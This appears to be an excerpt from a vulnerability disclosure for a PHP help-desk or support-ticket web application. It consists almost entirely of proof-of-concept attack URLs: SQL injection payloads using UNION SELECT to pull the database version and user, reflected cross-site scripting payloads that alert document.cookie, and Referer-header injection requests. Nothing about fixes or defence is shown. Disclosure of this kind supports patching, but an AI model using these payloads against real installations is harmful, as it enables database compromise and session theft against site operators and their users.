SQL injection: URIs http://www.example.com/portal/kb.php?start=SQL_CODE_HERE http://www.example.com/contract_add_service.php?contractid=1%20union%20%28select%20min%28@a:=1%29from%20%28select%201%2 0union%20select%202%29k%20group%20by%20%28select%20concat%28@@version,0x0,@a:=%28@a%2B1%29%2%29%29%29%20+--+ http://www.example.com/edit_escalation_path.php?id=-1%20union%20select%201,version%28%29,user%28%29,4,5,6,7,8,9 http://www.example.com/holding_queue.php?unlock=%27SQL_CODE_HERE http://www.example.com/holding_queue.php?lock=%27SQL_CODE_HERE http://www.example.com/search.php?q=123&domain=incidents&start=SQL_CODE_HERE[code] http://www.example.com/transactions.php?sites[]=1%20union%20select%201,2,3,4,5,6,7,8,version%28%29, 10,11,12,13,14,15,16%20+--+ Inputs: Cross-site scripting: URIs http://www.example.com/contact_support.php?mode=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/contract_add_service.php?contractid=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/edit_backup_users.php?user=%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/edit_escalation_path.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/inbox.php?action=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/incident_add.php?action=findcontact&search_string=%3Cscript%3Ealert%28document.cookie%29;%3C /script%3E http://www.example.com/report_incidents_by_vendor.php?mode=1&startdate=%3Cscript%3Ealert%281%29;%3C/script%3E&e nddate=%3Cscript%3Ealert%282%29;%3C/script%3E Inputs: GET /forgotpwd.php?userid=1&action=sendpwd HTTP/1.1 Referer: ' GET /billable_incidents.php?mode=approvalpage&output=html HTTP/1.1 Referer: '> GET /transactions.php?display=html HTTP/1.1 Referer: '> Cross-site request-forgery: Input: